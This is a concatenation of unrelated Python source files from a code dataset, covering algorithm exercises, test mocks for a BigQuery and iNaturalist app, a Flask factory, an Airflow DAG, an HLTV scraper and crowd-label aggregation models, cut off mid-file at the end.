\n def pop_ele(self,c):\n if(self.s[-1]=='{' and c=='}'):\n self.s.pop()\n return 1\n elif(self.s[-1]=='[' and c==']'):\n self.s.pop()\n return 1\n elif(self.s[-1]=='(' and c==')'):\n self.s.pop()\n return 1\n else:\n return 0\n \n def push(self,ele):\n self.s.append(ele)\n \n def length(self):\n return len(self.s )\n \n \nbrac=list(input().strip())\ns=Stack()\nfor i in brac:\n if(i=='{' or i=='[' or i=='('):\n s.push(i)\n else:\n if(s.pop_ele(i)):\n continue\n else:\n break\nif(s.length()==0):\n print('1')\nelse:\n print('0')\n\n\n#end\n","sub_path":"parenthesis_stack.py","file_name":"parenthesis_stack.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"391993792","text":"\"\"\"\nMinimum Domino Rotations For Equal Row\nIn a row of dominoes, A[i] and B[i] represent the top and bottom halves of the ith domino. 
(A domino is a tile with two numbers from 1 to 6 - one on each half of the tile.)\n\nWe may rotate the ith domino, so that A[i] and B[i] swap values.\n\nReturn the minimum number of rotations so that all the values in A are the same, or all the values in B are the same.\n\nIf it cannot be done, return -1.\n\n\n\nExample 1:\n\n\nInput: A = [2,1,2,4,2,2], B = [5,2,6,2,3,2]\nOutput: 2\nExplanation:\nThe first figure represents the dominoes as given by A and B: before we do any rotations.\nIf we rotate the second and fourth dominoes, we can make every value in the top row equal to 2, as indicated by the second figure.\nExample 2:\n\nInput: A = [3,5,1,2,3], B = [3,6,3,3,4]\nOutput: -1\nExplanation:\nIn this case, it is not possible to rotate the dominoes to make one row of values equal.\n\n\nConstraints:\n\n2 <= A.length == B.length <= 2 * 104\n1 <= A[i], B[i] <= 6\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def minDominoRotations(self, A: List[int], B: List[int]) -> int:\n # Solution 1 - 1272 ms\n \"\"\"\n s, n = set([1, 2, 3, 4, 5, 6]), len(A)\n for i in range(n):\n s &= set([A[i], B[i]])\n if not s:\n return -1\n flips1 = sum(A[i] == list(s)[0] for i in range(n))\n flips2 = sum(B[i] == list(s)[0] for i in range(n))\n return min(n - flips1, n - flips2)\n \"\"\"\n # Solution 2 - 1004 ms\n assert (len(A) >= 2)\n\n def check(x):\n \"\"\"\n Return min number of swaps\n if one could make all elements in A or B equal to x.\n Else return -1.\n \"\"\"\n # how many rotations should be done\n # to have all elements in A equal to x\n # and to have all elements in B equal to x\n rotations_a = rotations_b = 0\n for i in range(n):\n # rotations coudn't be done\n if A[i] != x and B[i] != x:\n return -1\n # A[i] != x and B[i] == x\n elif A[i] != x:\n rotations_a += 1\n # A[i] == x and B[i] != x\n elif B[i] != x:\n rotations_b += 1\n # min number of rotations to have all\n # elements equal to x in A or B\n return min(rotations_a, rotations_b)\n\n n = len(A)\n rotations = check(A[0])\n # If one could make all elements in A or B equal to A[0]\n if rotations != -1:\n return rotations\n # If one could make all elements in A or B equal to B[0]\n else:\n return check(B[0])\n\n\n\n\n# Main call\nsolution = Solution()\nA = [2,1,2,4,2,2]\nB = [5,2,6,2,3,2]\n\nprint(solution.minDominoRotations(A, B))","sub_path":"src/arrays/minDominoRotations.py","file_name":"minDominoRotations.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146288214","text":"import json\n\n\nAPI_RESPONSE = {\n 'token': {\n 'failed': {\n 'error': 'invalid_grant',\n 'error_description': 'The provided authorization grant is invalid, expired, revoked, does not match the redirection URI used in the authorization request, or was issued to another client.'\n },\n 'success': {\n 'access_token': '7fe9ad7e6aeccac0cbc29af7a4b3fb180a8f0c48f2529a0e182659f2e97fecf8',\n 'token_type': 'Bearer',\n 'scope': 'write login',\n 'created_at': 1626487193\n }\n },\n 'observation': {\n 'success': [\n {\n \"id\": 83433296,\n \"observed_on\": \"2021-06-17\",\n \"description\": None,\n \"latitude\": \"-39.8371200562\",\n \"longitude\": \"-73.2069473267\",\n \"map_scale\": None,\n \"timeframe\": None,\n \"species_guess\": \"Mariposas y polillas\",\n \"user_id\": 3918216,\n \"taxon_id\": 47157,\n \"created_at\": \"2021-06-17T21:06:54.468Z\",\n \"updated_at\": \"2021-06-18T14:45:32.473Z\",\n \"place_guess\": \"Valdivia\",\n \"id_please\": False,\n 
\"observed_on_string\": \"Thu Jun 17 2021 17:02:30 GMT -0400 (GMT-4)\",\n \"iconic_taxon_id\": 47158,\n \"num_identification_agreements\": 2,\n \"num_identification_disagreements\": 0,\n \"time_observed_at\": \"2021-06-17T21:02:30.000Z\",\n \"time_zone\": \"Santiago\",\n \"location_is_exact\": False,\n \"delta\": False,\n \"positional_accuracy\": 202,\n \"private_latitude\": None,\n \"private_longitude\": None,\n \"geoprivacy\": None,\n \"quality_grade\": \"needs_id\",\n \"positioning_method\": None,\n \"positioning_device\": None,\n \"out_of_range\": None,\n \"license\": \"CC-BY-NC\",\n \"uri\": \"https://www.inaturalist.org/observations/83433296\",\n \"observation_photos_count\": 1,\n \"comments_count\": 0,\n \"zic_time_zone\": \"America/Santiago\",\n \"oauth_application_id\": 333,\n \"observation_sounds_count\": 0,\n \"identifications_count\": 2,\n \"captive\": False,\n \"community_taxon_id\": 47157,\n \"site_id\": 1,\n \"old_uuid\": None,\n \"public_positional_accuracy\": 202,\n \"mappable\": True,\n \"cached_votes_total\": 0,\n \"last_indexed_at\": \"2021-06-18T14:45:36.018Z\",\n \"private_place_guess\": None,\n \"uuid\": \"0faceebf-5e45-4d52-b2ee-08909c9f7f17\",\n \"taxon_geoprivacy\": None,\n \"short_description\": None,\n \"user_login\": \"ndarwin\",\n \"iconic_taxon_name\": \"Insecta\",\n \"tag_list\": [],\n \"faves_count\": 0,\n \"created_at_utc\": \"2021-06-17T21:06:54.468Z\",\n \"updated_at_utc\": \"2021-06-18T14:45:32.473Z\",\n \"time_observed_at_utc\": \"2021-06-17T21:02:30.000Z\",\n \"owners_identification_from_vision\": True,\n \"taxon\": {\n \"id\": 47157,\n \"name\": \"Lepidoptera\",\n \"rank\": \"order\",\n \"ancestry\": \"48460/1/47120/372739/47158/184884\",\n \"common_name\": {\n \"id\": 865882,\n \"name\": \"Butterflies and Moths\",\n \"is_valid\": True,\n \"lexicon\": \"English\"\n }\n },\n \"iconic_taxon\": {\n \"id\": 47158,\n \"name\": \"Insecta\",\n \"rank\": \"class\",\n \"rank_level\": 50.0,\n \"ancestry\": \"48460/1/47120/372739\"\n },\n \"user\": {\n \"login\": \"ndarwin\",\n \"user_icon_url\": None\n },\n \"photos\": [\n {\n \"id\": 137026879,\n \"user_id\": 3918216,\n \"native_photo_id\": \"137026879\",\n \"square_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/square.jpeg?1623964017\",\n \"thumb_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/thumb.jpeg?1623964017\",\n \"small_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/small.jpeg?1623964017\",\n \"medium_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/medium.jpeg?1623964017\",\n \"large_url\": \"https://inaturalist-open-data.s3.amazonaws.com/photos/137026879/large.jpeg?1623964017\",\n \"created_at\": \"2021-06-17T21:06:59.196Z\",\n \"updated_at\": \"2021-06-17T21:06:59.196Z\",\n \"native_page_url\": \"https://www.inaturalist.org/photos/137026879\",\n \"native_username\": \"ndarwin\",\n \"native_realname\": \"Nelson\",\n \"license\": 2,\n \"subtype\": None,\n \"native_original_image_url\": None,\n \"uuid\": \"d3336fc4-aacf-44a1-80bc-7046b14c4ac7\",\n \"license_code\": \"CC-BY-NC\",\n \"attribution\": \"(c) Nelson, some rights reserved (CC BY-NC)\",\n \"license_name\": \"Creative Commons Attribution-NonCommercial License\",\n \"license_url\": \"http://creativecommons.org/licenses/by-nc/4.0/\",\n \"type\": \"LocalPhoto\"\n }\n ]\n }\n ]\n }\n}\n\n\nclass ItemMock:\n def __init__(self):\n self.bbox = json.dumps({'sw': {'lat': 1, 'lng': 1}, 'ne': {'lat': 1, 'lng': 1}})\n self.results = json.dumps([\n {\n 
'photos': [\n {\n 'thumb_url': 'http://thumb.url.com/img.png',\n 'large_url': 'http://thumb.url.com/img.png',\n }\n ],\n 'b': 2\n }\n ])\n self.created = ''\n self.uri = ''\n self.user_id = ''\n\n\nclass TableRefMock:\n\n def __iter__(self):\n return [ItemMock(), ItemMock()]\n\n\nclass RowResultMock:\n\n @property\n def total_rows(self):\n return 1\n\n\nclass QJobMock:\n def result(self):\n return RowResultMock()\n\n @property\n def destination(self):\n return TableRefMock()\n\n\nclass RowIterMock:\n def __iter__(self):\n for i in [ItemMock(), ItemMock()]:\n yield i\n\n\nclass TableIterMock:\n def __iter__(self):\n for i in [ItemMock(), ItemMock()]:\n yield i\n\n\nclass BQClientMock:\n def __init__(self, **kwargs):\n self.insert = kwargs.get('insert', True)\n pass\n\n def query(self, qs: str) -> QJobMock:\n return QJobMock()\n\n def get_table(self, p: RowIterMock) -> TableIterMock:\n return TableIterMock()\n\n def list_rows(self, dest, **kwargs):\n return RowIterMock()\n\n def insert_rows_json(self, tbl_id: str, list_dict: list) -> list:\n if not self.insert:\n return [\n {\n 'index': 0,\n 'errors': [\n {\n 'reason': 'invalid',\n 'location': 'x_id',\n 'debugInfo': '',\n 'message': 'no such field: x_id.'\n }\n ]\n }\n ]\n\n return []\n\n\nclass bquerymock:\n\n def __init__(self, **kwargs):\n self.args = kwargs\n\n def Client(self):\n return BQClientMock(**self.args)\n","sub_path":"back/api/tests/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":8027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"259659436","text":"import sys\nimport pickle\nimport glob\nimport pandas as pd\nimport numpy as np\nfrom argparse import ArgumentParser\n\n\nif __name__ == '__main__':\n\n parser = ArgumentParser()\n\n parser.add_argument(\n \"-m\",\n \"--mode\",\n type=str,\n dest=\"mode\",\n help='cassette or telemetry or file',\n default=None)\n\n parser.add_argument(\n \"-t\",\n \"--type\",\n type=str,\n dest=\"type\",\n help='output type pickle or parquet',\n default='pickle')\n\n parser.add_argument(\n \"-f\",\n \"--file\",\n action='append',\n dest=\"files\",\n help='files to be merged',\n default=[])\n\n parser.add_argument(\n \"-d\",\n \"--debug\",\n action='store_true',\n dest='debug',\n help='debug print mode',\n default=False)\n\n options = parser.parse_args()\n if options.mode in ('cassette', 'telemetry'):\n loc = f'../data/{options.mode}.*.pkl'\n files = glob.glob(loc)\n else:\n files = None\n\n if options.files != []:\n files = [f\"../data/{f}\" for f in options.files]\n\n merged_df = None\n i = 1\n for f in files:\n data = pickle.load(open(f, \"rb\"))\n if merged_df is None:\n merged_df = pd.DataFrame(data, columns=['recording', 'time', 'X', 'y'])\n else:\n df = pd.DataFrame(data, columns=['recording', 'time', 'X', 'y'])\n df.drop(columns=['y'], inplace=True)\n merged_df = merged_df.merge(df, on=['recording', 'time'], how='inner', suffixes=(\"\", f\"_{i}\"))\n i += 1\n merged_df.rename(columns={'X': 'X_1'}, inplace=True)\n for j in range(1, i):\n if merged_df[f'X_{j}'].loc[0].ndim == 1:\n dfc = merged_df.copy()\n cols = []\n for k in range(merged_df[f'X_{j}'].loc[0].shape[0]):\n cols.append(f'X_{j}_{k}')\n dfc[cols] = pd.DataFrame(dfc[f'X_{j}'].tolist(), index=dfc.index)\n merged_df = pd.concat((merged_df, dfc[cols]), axis=1)\n merged_df = merged_df.drop(columns=[f'X_{j}'])\n\n if options.type == 'pickle':\n if options.mode in ('cassette', 'telemetry'):\n outfile = f'../data/{options.mode}.pkl'\n else:\n if len(files) == 
1:\n outfile = f'../data/merged-{options.files[0]}'\n else:\n outfile = f'../data/merged-output.pkl'\n merged_df.to_pickle(outfile)\n else:\n if options.mode in ('cassette', 'telemetry'):\n outfile = f'../data/{options.mode}.pkt'\n else:\n if len(files) == 1:\n fn = (options.files[0]).replace('pkl', 'pqt')\n outfile = f'../data/merged-{fn}'\n else:\n outfile = f'../data/merged-output.pkt'\n merged_df.to_parquet(outfile)\n print(merged_df)\n print(outfile)\n","sub_path":"code/merge_features.py","file_name":"merge_features.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"597910494","text":"\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_bootstrap import Bootstrap\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\nbootstrap = Bootstrap()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config[\"SECRET_KEY\"] = 'secret'\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///app.db\"\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\n db.init_app(app)\n login_manager.init_app(app)\n bootstrap.init_app(app)\n\n\n from app import routes\n routes.init_app(app)\n\n return app\n\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"235226921","text":"# -*- coding:UTF-8 -*-\r\nfrom sqlalchemy.orm.exc import NoResultFound\r\nfrom lite_mms import models\r\nfrom lite_mms.apis import ModelWrapper\r\nfrom lite_mms.utilities import do_commit\r\n\r\nclass CustomerWrapper(ModelWrapper):\r\n def __str__(self):\r\n return self.name\r\n\r\n def __eq__(self, other):\r\n return isinstance(other, CustomerWrapper) and other.id == self.id\r\n\r\n def __hash__(self):\r\n return hash(self.id)\r\n\r\n @classmethod\r\n def get_list(cls):\r\n \"\"\"\r\n get customer list from database\r\n \"\"\"\r\n return [CustomerWrapper(c) for c in models.Customer.query.all()]\r\n\r\n\r\n @classmethod\r\n def get_customer(cls, customer_id):\r\n \"\"\"\r\n get a customer by id from database\r\n :return: the customer of given id or None if there's no such customer\r\n \"\"\"\r\n if not customer_id:\r\n return None\r\n try:\r\n return CustomerWrapper(models.Customer.query.filter(\r\n models.Customer.id == customer_id).one())\r\n except NoResultFound:\r\n return None\r\n\r\n @classmethod\r\n def get_customer_list(cls, model):\r\n q = models.Customer.query\r\n if model:\r\n q = q.join(model).filter(model.customer != None)\r\n return [CustomerWrapper(customer) for customer in q.all()]\r\n\r\ndef post_customers(data):\r\n count = 0\r\n for customer in data:\r\n try:\r\n models.Customer.query.filter(\r\n models.Customer.name == customer[\"name\"]).one()\r\n except NoResultFound:\r\n do_commit(models.Customer(name=customer[\"name\"],\r\n abbr=customer[\"short\"],\r\n MSSQL_ID=customer[\"id\"]))\r\n count += 1\r\n return u\"成功添加%d条客户信息\" % count\r\n\r\nget_customer_list = CustomerWrapper.get_list\r\nget_customer = CustomerWrapper.get_customer\r\n","sub_path":"lite_mms/apis/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"425191518","text":"def fibo(n):\r\n if n <= 2:\r\n return 1\r\n #print(n)\r\n return fibo(n - 1) + fibo(n - 2)\r\n\r\nmemo = {\r\n 1: 1,\r\n 2: 1\r\n}\r\n\r\ndef 
fibo_m(n):\r\n if n not in memo:\r\n print(str(n) + \": \" + str(memo))\r\n memo[n-2] = fibo_m(n - 2)\r\n memo[n-1] = fibo_m(n - 1)\r\n memo[n] = memo[n-1] + memo[n-2]\r\n return memo[n]\r\n\r\ndef memoize(fn, n):\r\n __memo = {}\r\n if n not in __memo:\r\n __memo[n] = fn(n)\r\n return __memo[n]\r\n\r\ndef fibo_m_f(n):\r\n return memoize(fibo, n)\r\n\r\nclass Memoize:\r\n def __init__(self, f):\r\n self.f = f\r\n self.memo = {}\r\n\r\n def __call__(self, *args):\r\n if not args in self.memo:\r\n self.memo[args] = self.f(*args)\r\n return self.memo[args]\r\n\r\nfibo_1 = Memoize(fibo)\r\n\r\n@Memoize\r\ndef fibo_2(n):\r\n if n <= 2:\r\n return 1\r\n return fibo_2(n - 2) + fibo_2(n - 1)\r\n\r\nfor i in range(1, 10):\r\n #print(fibo(i))\r\n #print(fibo_m(i))\r\n pass\r\n\r\n#fibo(10)\r\n#fibo_m(10)\r\n#fibo_m_f(10)\r\nfibo_1(10)\r\nfibo_2(10)\r\n\r\n","sub_path":"posts/it - python get started/python - decorator/demo_memoization.py","file_name":"demo_memoization.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"313811083","text":"from airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'retries': 0,\n 'priority_weight': 5\n}\ndag = DAG(\n 'date',\n default_args=default_args,\n schedule_interval='01 00 * * *',\n max_active_runs=100\n)\n\ndef task1():\n print(\"hello world, hello airflow !!\")\ntask01 = PythonOperator(\n task_id='task1',\n python_callable=task1,\n start_date=datetime(2018, 7, 20),\n retries=0,\n dag=dag\n)\n\ndef task2():\n print(\"welcome to study airflow\")\ntask02 = PythonOperator(\n task_id='task2',\n python_callable=task2,\n start_date=datetime(2018, 7, 25),\n retries=0,\n dag=dag\n)\n\n","sub_path":"airflow/dag/date_dag.py","file_name":"date_dag.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"273820087","text":"# Own\nfrom mHLTVAPI import *\nfrom csgoDB import *\n\n# Standard\nimport os\nimport time\nimport random\n\n'''\nMines data from HLTV and writes it to sqlite db.\n-Request result pages from hltv\n--For each page, go through all matches,\n---Write data to local sqlite database\n-Request finished events from hltv\n--Write all to same database\n'''\n\n# Basic example of hltvAPI + csgoDB usage\ndef loadTestData():\n\tfor j in range(9, 20):\n\t\tpage = GetMatchResultsPage(j)\n\t\tfor i in range(0, len(page)):\n\t\t\tmID = SToI(page[i].split(\"/\")[2])\n\t\t\texistsInDB = GetMatchByID(mID)\n\t\t\tif existsInDB == None:\n\t\t\t\tmatch = GetMatch(page[i])\n\t\t\t\tif match != None:\n\t\t\t\t\tsuc1 = InsertMatchToDB(match[0])\n\t\t\t\t\tfor m in match[1]:\n\t\t\t\t\t\tInsertMapToDB(m)\n\t\t\telse:\n\t\t\t\tprint(\"existsInDB:\", existsInDB)\n\t\t\tif i == 24:\n\t\t\t\tprint('''25% of page done!''')\n\t\t\telif i == 49:\n\t\t\t\tprint('''50% of page done!''')\n\t\t\telif i == 74:\n\t\t\t\tprint('''75% of page done!''')\n\t\t\telif i == 99:\n\t\t\t\tprint('''100% of page done!''')\n\t\tprint(\"Finished parsing page\", j)\n\ndef batchLoader():\n\tmdebug = False\n\tminerRunning = True\n\tmcsgoDB = DB(\"mcsgo.db\")\n\n\t# Start from page 0\n\tcurpage = 3\n\twhile minerRunning:\n\t\tbatchtime = 5.0 # 5 sec per batch\n\t\tstarttime = time.time()\n\t\tsess = 
requests.Session()\n\t\t# Batch of 100 matches from results page\n\t\tmpage = GetMatchResultsPage(curpage, mdebug)\n\t\t\n\t\tfor p in mpage:\n\t\t\tmID = SToI(p.split(\"/\")[2])\n\t\t\texistsInDB = mcsgoDB.GetMatchByID(mID, mdebug)\n\t\t\tif existsInDB == None:\n\t\t\t\tmatch = GetMatch(p, mdebug)\n\t\t\t\tif match != None:\n\t\t\t\t\tsuc1 = mcsgoDB.InsertMatch(match[0], mdebug)\n\t\t\t\t\tfor m in match[1]:\n\t\t\t\t\t\tsuc2 = mcsgoDB.InsertMap(m, mdebug)\n\t\t\telse:\n\t\t\t\tprint(\"existsInDB:\", existsInDB)\n\t\t\t\tbatchtime -= 0.05\n\n\t\tsleeptime = batchtime - (time.time() - starttime)\n\t\tprint(sleeptime)\n\t\tif sleeptime > 0: # Sleep a bit if we are progressing too fast\n\t\t\ttime.sleep(sleeptime)\n\t\t\tprint(\"SLEEPPINK\")\n\t\tcurpage += 1\n\ndef main():\n\tprint(\"\\n---HLTVminer starting---\")\n\tdebug = False\n\n\tbatchLoader()\n\t#events = GetFinishedEvents(0, minerdbg)\n\n\t#res = GetTesting()\n\t#print(res)\n\n\t#res1 = GetMatchByID(match[0][0],dbdbg)\n\t#print(\"matchQuery:\", res1)\n\t#for m in match[1]:\n\t#\tres2 = GetMapByID(m[0],dbdbg)\n\t#\tres3 = GetPlayerStatsByMapID(m[0], dbdbg)\n\t#\tprint(\"mapQuery:\", res2)\n\t#\tprint(\"playerStatsQuery:\", res3)\n\n\t#res4 = GetMapsByMatchID(match[0][0], dbdbg)\n\t#print(\"mapsByMatchIDQuery:\", res4)\n\n\t#ongo = InsertEventToDB([\"MFirstEvent\", \"8+\", \"$200,000\", \"Intl. LAN\"], dbdbg)\n\t#ongo2 = InsertEventToDB([\"MSecondEvent\", \"16+\", \"$10,000\", \"Local LAN\"], dbdbg)\n\t#ongo3 = InsertEventToDB([\"MThirdEvent\", \"4\", \"Other\", \"Online\"], dbdbg)\n\n\t#res1 = GetEventByName(\"MFirstEvent\", dbdbg)\n\t#res2 = GetEventByName(\"MSecondEvent\", dbdbg)\n\t#res3 = GetEventByName(\"MThirdEvent\", dbdbg)\n\t#print(res1, res2, res3)\n\n\tprint(\"---HLTVminer quitting---\")\n\t\n\nmain()","sub_path":"HLTVminer.py","file_name":"HLTVminer.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"618009316","text":"import pprint as pp\nfrom decimal import Decimal\nfrom datetime import datetime, date, timedelta\nimport time\nimport mysql.connector\n\ndef node_up_duration():\n\tdb = mysql.connector.connect(user='root', database='log')\n\tcursor = db.cursor()\n\tcursor.execute(\"SELECT event_time, name, event_type from event_node ORDER BY event_time ASC;\")\n\tdata = cursor.fetchall()\n\tnode_life = {}\n\tfor row in data:\n\t\ttime = row[0]\n\t\tname = row[1]\n\t\tevent = row[2]\n\t\tif event == 'NODEUP':\n\t\t\tif name not in node_life:\n\t\t\t\tnode_life[name] = time\n\t\telif event == 'NODEDOWN':\n\t\t\tif name in node_life:\n\t\t\t\tinsert_duration(node_life[name], time, name, db)\n\tdb.close()\n\ndef insert_duration(up, down, name, db):\n\tf = '%Y-%m-%d %H:%M:%S'\n\tduration = (down - up).total_seconds()\n\tup = up.strftime(f) \n\tdown = down.strftime(f) \n\tcursorA = db.cursor()\n\tcursorA.execute(\"INSERT INTO node_intervals (up_time, down_time, name, duration) VALUES (%s, %s, %s, %s )\",(up, down, name, duration))\n\tdb.commit()\n\nnode_up_duration()\n","sub_path":"src/node_up_duration.py","file_name":"node_up_duration.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"142532050","text":"\"\"\"\nBecause we are not allowed division we maintain 2 arrays of precomputed products before and after a particular index. 
\nBoth these arrays can be constructed in O(n) time and O(n) space.\n\nWorks on leet code \nTime Complexity - O(n)\nSpace Complexity - O(n)\n\"\"\"\nfrom collections import deque\nclass Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n N = len(nums)\n if N <= 1 :\n return None # edge case .. should never happen\n\n left = [1] \n right = deque() \n right.appendleft(1)\n for i in range(N-1) :\n left.append(left[-1]*nums[i])\n right.appendleft(right[0]*nums[N-i-1])\n\n return [left[i]*right[i] for i in range(N)]\n\n\n","sub_path":"product_except_self.py","file_name":"product_except_self.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"81676444","text":"import os\nimport time\nimport pyjags\nimport warnings\nimport numpy as np\nimport multiprocessing as mp\nimport peerprediction.tools.PeerSampler as ps\n\n\n\n###############################################\n# Aggregation algorithm Spectral Meta-Learner #\n###############################################\n\nclass SpectralMetaLearner(object):\n\n # Method initializing aggregating\n # parameters: reports - ndarray (dim=N*M or N >= 2, M >= 2))\n def aggregate(self, ls):\n labels = ls * 2 - 1\n self.labels = labels\n self.find_eig()\n\n def create_cov_mat(self):\n n_voters = self.labels.shape[0]\n n_tasks = self.labels.shape[1]\n\n voters_means = np.mean(self.labels, axis=1)\n centered_labels = self.labels - voters_means[:, None]\n\n normalizer = 1.0 / (n_tasks - 1)\n cov_mat = np.dot(centered_labels,\n np.transpose(centered_labels)) * normalizer\n\n self.cov_mat_ = cov_mat\n\n def create_left(self, n_unk):\n n_eq = int((n_unk-1)*(n_unk)/2)\n mat = np.zeros((n_eq, n_unk))\n i = 0\n j = 1\n counter = 0\n\n while counter < n_eq:\n mat[counter, i] = 1\n mat[counter, j] = 1\n if j == n_unk-1:\n i += 1\n j = i+1\n else:\n j += 1\n counter += 1\n\n return mat\n\n def create_both(self):\n n_unk = self.cov_mat_.shape[0]\n n_eq = int((n_unk-1)*(n_unk)/2)\n left_side = self.create_left(n_unk)\n right_side = np.zeros(n_eq)\n\n counter = 0\n\n while counter < n_eq:\n idx = np.where(left_side[counter, :] == 1)[0]\n right_side[counter] = self.cov_mat_[idx[0], idx[1]]\n counter += 1\n\n return left_side, right_side\n\n def solve_linear_system(self):\n left_side, right_side = self.create_both()\n selector = right_side != 0\n new_l = left_side[selector, :]\n new_r = np.log(np.abs(right_side[selector]))\n\n pseudo_inv = np.linalg.pinv(new_l)\n ols_solution = np.dot(pseudo_inv, new_r)\n\n return ols_solution\n\n def generate_rank1_mat(self):\n diag = self.solve_linear_system()\n n = self.cov_mat_.shape[0]\n rank1_mat = np.copy(self.cov_mat_)\n\n self.overflow_ = False\n\n for i in range(n):\n diagonal_element = np.exp(2*diag[i])\n if np.isinf(diagonal_element):\n self.overflow_ = True\n warnings.warn(\"Warning: One of the diagonal elements of rank-1 \\\n matrix overflowed. 
Original covariance matrix will be used instead \\\n for eigendecompostition\")\n break\n else:\n rank1_mat[i, i] = diagonal_element\n\n self.rank1_mat_ = rank1_mat\n\n def find_eig(self):\n self.create_cov_mat()\n self.generate_rank1_mat()\n\n if self.overflow_:\n w, v = np.linalg.eig(self.cov_mat_)\n else:\n w, v = np.linalg.eig(self.rank1_mat_)\n\n idx = np.argmax(w)\n largest_eig = v[:, idx]\n\n if np.mean(largest_eig) < 0:\n largest_eig = -largest_eig\n\n self.eig_ = largest_eig\n\n # Shows aggregated reports\n # Returs: recovered_ground_truth_ - ndarray (dim=M)\n def predict(self):\n pred = (np.dot(np.transpose(self.labels), self.eig_) > 0).astype(int)\n return pred\n\n##############################################################\n# Aggregation algorithm Hierarchical General Condorcet Model #\n##############################################################\n\nclass HGCM(object):\n\n # Constructor\n # parameters: adapt - number of adapting iterations for Gibbs Sampler\n # iterations - number of sampling iterations for Gibbs Sampler\n # chains - number of chains for Gibbs Sampler\n # thin - thinning interval for Gibbs Sampler\n # progress_bar - shows progress bar if True\n # threads - number of threads to use\n def __init__(self, adapt=1000, iterations=1000, chains=4, thin=1, progress_bar=True, threads=1):\n\n self.adapt = adapt\n self.iterations = iterations\n self.chains = chains\n self.thin = thin\n self.progress_bar = progress_bar\n self.threads = threads\n\n # Method initializing aggregating\n # parameters: reports - ndarray (dim=N*M or N >= 2, M >= 2))\n def aggregate(self, reports):\n script_path = os.path.abspath(__file__)\n script_dir = os.path.abspath(os.path.join(script_path, os.pardir))\n path = os.path.join(script_dir, 'hgcm_model.jags')\n\n n = reports.shape[0]\n m = reports.shape[1]\n Xtheta = np.transpose(np.array([np.ones(n)]))\n Xg = np.transpose(np.array([np.ones(n)]))\n Xdelta = np.transpose(np.array([np.ones(m)]))\n\n model = pyjags.Model(file=path, data=dict(Y=reports, n=n, m=m,\n nrofdeltacov=1, nrofgcov=1, nrofthetacov=1,\n Xtheta=Xtheta, Xg=Xg, Xdelta=Xdelta), chains=self.chains,\n adapt=self.adapt, progress_bar=self.progress_bar, threads=self.threads)\n\n self.run_sampling(model)\n\n def run_sampling(self, model):\n samples = model.sample(self.iterations, vars=['Z'], thin=self.thin)\n self.recovered_ground_truth_ = (np.mean(np.mean(samples['Z'], axis=2), axis=1) > 0.5).astype(int)\n\n # Shows aggregated reports\n # Returs: recovered_ground_truth_ - ndarray (dim=M)\n def predict(self):\n return self.recovered_ground_truth_\n\n########################################\n# Aggregation algorithm Two-coin Model #\n########################################\n\nclass TwoCoinModel(object):\n\n # Constructor\n # parameters: epsilon - convergence threshold\n # iterations - number of iterations of EM algorithm to do.\n # Can stop earlier if convergence criterion met\n def __init__(self, epsilon=0.01, iterations=10000):\n self.epsilon = epsilon\n self.iterations = iterations\n self.iterations_done = 0\n\n # Method initializing aggregating\n # parameters: reports - ndarray (dim=N*M or N >= 2, M >= 2))\n def aggregate(self, reports):\n\n myus = np.mean(reports, axis=0)\n\n for i in range(self.iterations):\n alphas, betas, p = self.update_parameters(reports, myus)\n new_myus = self.update_myus(reports, alphas, betas, p)\n\n diff = np.sum(np.abs(myus - new_myus))\n myus = new_myus\n\n if diff < self.epsilon:\n break\n\n self.iterations_done += 1\n\n if self.iterations_done == 
